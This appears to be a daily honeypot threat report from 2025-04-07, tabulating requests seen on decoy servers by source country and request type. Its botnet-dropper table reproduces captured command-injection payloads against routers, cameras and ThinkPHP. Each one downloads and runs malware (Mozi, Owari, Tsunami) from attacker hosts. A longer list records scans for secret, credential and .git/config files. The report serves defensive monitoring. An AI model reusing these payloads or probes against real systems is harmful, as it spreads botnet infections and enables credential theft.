Skip to main content
  1. Daily-Posts/

Report: 2025-04-07

·1203 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-07
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 12 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 155 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3066 requests were recorded during the day, originating from 12 different countries, with a peak of 679 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SCGermany
DEGermany
USGermany
USGermany
USGermany
USGermany
AU
USDubai
CNGeorgia
GBGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
139.5.1.166GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.1.166:50235/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
43.230.156.14GET /shell?cd+/tmp;rm+-rf+*;wget+http://43.230.156.14:48972/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
58.146.59.84GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
58.58.30.134GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
217.160.89.196GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://45.137.70.156/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
110.175.39.203GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
83.63.8.151GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
84.195.192.75GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
90.214.52.113GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
51.190.15.243GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
82.38.194.39GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
755GET /config/initializers/oauth.rb HTTP/1.1
765GET /config.xml HTTP/1.1
775GET /config/app_config.yaml HTTP/1.1
785GET /config/google.json HTTP/1.1
795GET /config/development.json HTTP/1.1
805GET /secrets/oauth.json HTTP/1.1
815GET /secrets/auth.yaml HTTP/1.1
825GET /config/production.json HTTP/1.1
855GET /secrets.py HTTP/1.1
865GET /auth/keys.ini HTTP/1.1
875GET /microservices/oauth/config.json HTTP/1.1
915GET /etc/oauth/config.json HTTP/1.1
925GET /config/staging.yaml HTTP/1.1
935GET /config/okta_oauth.yaml HTTP/1.1
945GET /app/secrets/oauth.yaml HTTP/1.1
955GET /secrets/token_store.yaml HTTP/1.1
965GET /config/github.yaml HTTP/1.1
975GET /src/main/resources/application.yml HTTP/1.1
985GET /config/server_auth.yaml HTTP/1.1
995GET /src/config/api_keys.json HTTP/1.1
1005GET /etc/auth/secrets.yaml HTTP/1.1
1015GET /settings/service_keys.ini HTTP/1.1
1025GET /security/keys.json HTTP/1.1
1035GET /auth/settings.yaml HTTP/1.1
1045GET /vault/config.json HTTP/1.1
1055GET /auth/config.json HTTP/1.1
1065GET /cloud/settings.yaml HTTP/1.1
1075GET /config/integration.json HTTP/1.1
1085GET /config/credentials.yml HTTP/1.1
1095GET /secrets/secrets.json HTTP/1.1
1105GET /vault/oauth.yaml HTTP/1.1
1125GET /etc/app/config.ini HTTP/1.1
1135GET /config/client_oauth.json HTTP/1.1
1145GET /conf.d/oauth.conf HTTP/1.1
1155GET /config/auth_override.json HTTP/1.1
1165GET /config/aws.json HTTP/1.1
1175GET /config/twitter_auth.yaml HTTP/1.1
1185GET /environments/dev/config.yaml HTTP/1.1
1195GET /secrets/integration_auth.yaml HTTP/1.1
1205GET /config/oauth.json HTTP/1.1
1215GET /auth.json HTTP/1.1
1225GET /security/oauth.json HTTP/1.1
1235GET /config/external_auth.json HTTP/1.1
1255GET /scripts/auth_settings.yaml HTTP/1.1
1265GET /services/auth/config.json HTTP/1.1
1275GET /services/api/auth.yaml HTTP/1.1
1285GET /application.yml HTTP/1.1
1305GET /config/gcp_oauth.json HTTP/1.1
1315GET /auth/provider_config.yaml HTTP/1.1
1325GET /test/settings.yaml HTTP/1.1
1335GET /spec/config/oauth.yaml HTTP/1.1
1345GET /scripts/secrets.yaml HTTP/1.1
1355GET /usr/src/app/auth.json HTTP/1.1
1365GET /settings/base.ini HTTP/1.1
1375GET /src/config/settings.yaml HTTP/1.1
1385GET /app/settings/auth.json HTTP/1.1
1395GET /config/api.json HTTP/1.1
1405GET /config/database.yml HTTP/1.1
1415GET /config/microsoft.json HTTP/1.1
1425GET /project/settings.py HTTP/1.1
1435GET /config/dev_config.ini HTTP/1.1
1445GET /config/base.json HTTP/1.1
1455GET /config/auth.yaml HTTP/1.1
1465GET /config/security.ini HTTP/1.1
1475GET /scripts/config.json HTTP/1.1
1485GET /config/db.json HTTP/1.1
1505GET /tests/auth_config.ini HTTP/1.1
1515GET /config/facebook_oauth.json HTTP/1.1
1525GET /services/user/settings.yaml HTTP/1.1
1535GET /environments/prod/settings.json HTTP/1.1
1545GET /security/auth_settings.yaml HTTP/1.1
1555GET /db/settings.ini HTTP/1.1
1565GET /config/service_auth.json HTTP/1.1
1585GET /automation/oauth.json HTTP/1.1
1605GET /db/auth_config.json HTTP/1.1
1615GET /app/config/oauth.json HTTP/1.1
1625GET /security/api_settings.json HTTP/1.1
1635GET /src/auth/config.yaml HTTP/1.1
1645GET /tests/config/test_oauth.json HTTP/1.1
1655GET /app/auth/config.json HTTP/1.1
1665GET /settings/api_config.json HTTP/1.1
1675GET /config/azure_auth.yaml HTTP/1.1
1685GET /config/keys.yaml HTTP/1.1
1705GET /auth/oauth_config.ini HTTP/1.1
1715GET /config/local.yaml HTTP/1.1
4112GET /cgi-bin/welcome HTTP/1.1
4122GET /logon/LogonPoint/tmindex.html HTTP/1.1
4222GET /vpn/index.html HTTP/1.1
4811GET /odinhttpcall1744057397 HTTP/1.1
4821GET /OdinHttpCall1744057397 HTTP/1.1
4831GET /Odin/http/call1744057397 HTTP/1.1
4841GET /HNAP1 HTTP/1.1
4961GET /internal/.git/config HTTP/1.1
4971\x03\x00\x00&!\xE0\x00\x00\xFE\xCA\x00Cookie: mstshash=
4981\x00\x9C\x00\x01\x1A+<M\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\xFF\xFF\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
5691GET /zwso.php HTTP/1.1
5811GET /NmapUpperCheck1744031320 HTTP/1.1
5891GET /nVNJ HTTP/1.1
5911GET /nmaplowercheck1744031320 HTTP/1.1
6101GET /Nmap/folder/check1744031320 HTTP/1.1
8091GET /env.save HTTP/1.1
8101GET /sites/.env HTTP/1.1
8151GET /gists/cache HTTP/1.1
8341GET /platform/.env/conf/.env HTTP/1.1
8521\x00\x00\x00’\xFFSMBr\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0E\x00\x02NT LM 0.12\x00
8641\x00\x00\x00\x1D\xD0\xF2\x81\xF8\x8B\xFF\x9A\xF7\xD5\xEF\x94\xB6\xD1\xB4\xC0\x9F\xEC\x95\xE6\x8F\xE1\x87\xE8\xCA\xF0\x8B\xF6\x8B\xF6
8651c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00OISYSNEC\x00\x00\x00\x00
8691GET /Nmap/folder/check1744061948 HTTP/1.1
8701GET /NmapUpperCheck1744061948 HTTP/1.1
8711GET /nmaplowercheck1744061948 HTTP/1.1
8841GET /backend/.git/config HTTP/1.1
8851GET /api/v2/.git/config HTTP/1.1
8861GET /js../.git/config HTTP/1.1
8871GET /includes/.git/config HTTP/1.1
8881GET /html/.git/config HTTP/1.1
8891GET /download/.git/config HTTP/1.1
8921GET /api/v1/.git/config HTTP/1.1
8931GET /administrator/.git/config HTTP/1.1
8941GET /admin-panel/.git/config HTTP/1.1
8951GET /accounts/.git/config HTTP/1.1
8961GET /drupal/themes/.git/config HTTP/1.1
8971GET /docs/.git/config HTTP/1.1
8981GET /img../.git/config HTTP/1.1
8991GET /content../.git/config HTTP/1.1
9001GET /frontend/.git/config HTTP/1.1
9011GET /bin/.git/config HTTP/1.1
9021GET /about/.git/config HTTP/1.1
9031GET /vendor/drupal/coder/.git/config HTTP/1.1
9041GET /lib../.git/config HTTP/1.1
9051GET /home/.git/config HTTP/1.1
9061GET /help/.git/config HTTP/1.1
9071GET /forum/.git/config HTTP/1.1
9091GET /events../.git/config HTTP/1.1
9101GET /etc/.git/config HTTP/1.1
9111GET /css/.git/config HTTP/1.1
9121GET /auth/.git/config HTTP/1.1
9131GET /assets/.git/config HTTP/1.1
9141GET /drupal/.git/config HTTP/1.1
9151GET /customer/.git/config HTTP/1.1
9161\x00m\x00\x00\x01\x00\x00\x00\x018\x01,\x0CA \x00\xFF\xFF\x7F\x08\x00\x00\x01\x00\x003\x00:\x00\x00\x08\x00AA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=lzrORA))))
9171\x12\x01\x00/\x00\x00\x02\x00\x00\x00\x1A\x00\x06\x01\x00\x02\x00\x01\x02\x00!\x00\x01\x03\x00\x22\x00\x04\x04\x00&\x00\x01\xFF\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00
9181\x10\x0F\x00\x04MQTT\x04\x00\x00
9221GET /drupal/modules/.git/config HTTP/1.1
9231GET /console/.git/config HTTP/1.1
9241GET /cloud/.git/config HTTP/1.1
9251GET /cgi-bin/.git/config HTTP/1.1
9261GET /images../.git/config HTTP/1.1
9271GET /img/.git/config HTTP/1.1
9281GET /core/app/.git/config HTTP/1.1
9291GET /components/.git/config HTTP/1.1
9301GET /cache/.git/config HTTP/1.1
9311GET /css../.git/config HTTP/1.1
9461POST /onvif/device_service HTTP/1.1
9471GET /PSIA/index HTTP/1.1
9551\x14\x00\x00\x0Exxx.xxx.xxx.xxx\x00P\x01\x01\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0679NL
1528GB
2254SC
3252US
4215CN
5210AU
6169HK
7168PL
8161BG
981DE
1050ID
1137RU
1231CA
1326JP
1423UA
1520LV
1619FR
1718CH
1816IL
1916KR
2014NG
2110GH
2210IT
238BR
248LT
256BE
265TH
274IN
283TW
293SG
302AR
312MX
322HR
332FI
341ZA
351PA
361SA
371MK
381MD
391AZ
401PT
411GR
421EE
431KH
441AO
451TR
461ES
471RS

Related

Report: 2025-04-06
·510 words
Repport Daily
Report: 2025-04-05
·622 words
Repport Daily
Report: 2025-04-04
·1256 words
Repport Daily